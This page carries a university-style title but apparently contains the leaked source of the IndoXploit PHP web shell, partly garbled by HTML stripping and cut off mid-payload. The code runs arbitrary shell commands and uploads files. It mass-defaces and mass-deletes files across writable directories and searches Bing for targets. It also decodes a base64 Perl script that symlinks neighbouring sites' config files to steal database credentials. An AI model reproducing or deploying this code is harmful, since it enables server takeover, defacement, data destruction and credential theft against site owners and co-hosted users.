About IIT Kharagpur

IndoXploit
 ___________________________
< root@indoxploit:~# w00t??? >
 ---------------------------
            ,        ,
           /(        )`
            \___   / |
            /- _  `-/  `
           (//     /
           / /   | `    
           O O   ) /    |
           `-^--``<     `
          (_.)  _  )   /
           `.___/`    /
             `-----` /
<----.     __ / __   
<----|====O)))==) ) /====
<----`    `--` `.__,` 
             |        |
                     /
        ______( (_  / \______
      ,`  ,-----`   |        
      `--{__________)        /
 
    
IndoXploit ".$perm.""; } else { return "".$perm.""; } } function r($dir,$perm) { if(!is_readable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists(`system`)) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(`exec`)) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists(`passthru`)) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(`shell_exec`)) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = `s`; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = `l`; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = `-`; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = `b`; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = `d`; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = `c`; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = `p`; } else { // Unknown $info = `u`; } // Owner $info .= (($perms & 0x0100) ? `r` : `-`); $info .= (($perms & 0x0080) ? `w` : `-`); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? `s` : `x` ) : (($perms & 0x0800) ? `S` : `-`)); // Group $info .= (($perms & 0x0020) ? `r` : `-`); $info .= (($perms & 0x0010) ? `w` : `-`); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? `s` : `x` ) : (($perms & 0x0400) ? `S` : `-`)); // World $info .= (($perms & 0x0004) ? `r` : `-`); $info .= (($perms & 0x0002) ? `w` : `-`); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? `t` : `x` ) : (($perms & 0x0200) ? `T` : `-`)); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf(`%1.2f`,$s / 1073741824 ).` GB`; elseif($s >= 1048576) return sprintf(`%1.2f`,$s / 1048576 ) .` MB`; elseif($s >= 1024) return sprintf(`%1.2f`,$s / 1024 ) .` KB`; else return $s .` B`; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all(`#

ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists(`mysql_connect`)) ? "ON" : "OFF"; $curl = (function_exists(`curl_version`)) ? "ON" : "OFF"; $wget = (exe(`wget --help`)) ? "ON" : "OFF"; $perl = (exe(`perl --help`)) ? "ON" : "OFF"; $python = (exe(`python --help`)) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists(`posix_getegid`)) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[`name`]; $uid = $uid[`uid`]; $group = $gid[`name`]; $gid = $gid[`gid`]; } echo "System: ".$kernel."
"; echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
"; echo "Server IP: ".$ip." | Your IP: ".$_SERVER[`REMOTE_ADDR`]."
"; echo "HDD: $used / $total ( Free: $freespace )
"; echo "Safe Mode: $sm
"; echo "Disable Functions: $show_ds
"; echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
"; echo "Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "
$cdir/"; } echo "  [ ".w($dir, perms($dir))." ]"; echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if($_GET[`logout`] == true) { unset($_SESSION[md5($_SERVER[`HTTP_HOST`])]); echo ""; } elseif($_GET[`do`] == `upload`) { echo "
"; if($_POST[`upload`]) { if($_POST[`tipe_upload`] == `biasa`) { if(@copy($_FILES[`ix_file`][`tmp_name`], "$dir/".$_FILES[`ix_file`][`name`]."")) { $act = "Uploaded! at $dir/".$_FILES[`ix_file`][`name`].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER[`DOCUMENT_ROOT`]."/".$_FILES[`ix_file`][`name`]; $web = $_SERVER[`HTTP_HOST`]."/".$_FILES[`ix_file`][`name`]; if(is_writable($_SERVER[`DOCUMENT_ROOT`])) { if(@copy($_FILES[`ix_file`][`tmp_name`], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER[`DOCUMENT_ROOT`],"Writeable")." ]
"; echo $act; echo "
"; } elseif($_GET[`do`] == `cmd`) { echo "
".$user."@".$ip.": ~ $ >`>
"; if($_POST[`do_cmd`]) { echo "
".exe($_POST[`cmd`])."
"; } } elseif($_GET[`do`] == `mass_deface`) { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.`/`.$namafile; if($dirb === `.`) { file_put_contents($lokasi, $isi_script); } elseif($dirb === `..`) { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.`/`.$namafile; if($dirb === `.`) { file_put_contents($lokasi, $isi_script); } elseif($dirb === `..`) { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST[`start`]) { if($_POST[`tipe_sabun`] == `mahal`) { echo "
"; sabun_massal($_POST[`d_dir`], $_POST[`d_file`], $_POST[`script`]); echo "
"; } elseif($_POST[`tipe_sabun`] == `murah`) { echo "
"; sabun_biasa($_POST[`d_dir`], $_POST[`d_file`], $_POST[`script`]); echo "
"; } } else { echo "
"; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } elseif($_GET[`do`] == `mass_delete`) { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.`/`.$namafile; if($dirb === `.`) { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === `..`) { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST[`start`]) { echo "
"; hapus_massal($_POST[`d_dir`], $_POST[`d_file`]); echo "
"; } else { echo "
"; echo "
Folder:

Filename:

"; } } elseif($_GET[`do`] == `config`) { $idx = mkdir("idx_config", 0777); $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI Require None Satisfy Any AddType application/x-httpd-cgi .cin AddHandler cgi-script .cin AddHandler cgi-script .cin"; $htc = fopen("idx_config/.htaccess","w"); fwrite($htc, $isi_htc); fclose($htc); if(preg_match("/vhosts|vhost/", $dir)) { $link_config = str_replace($_SERVER[`DOCUMENT_ROOT`], "", $dir); $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4....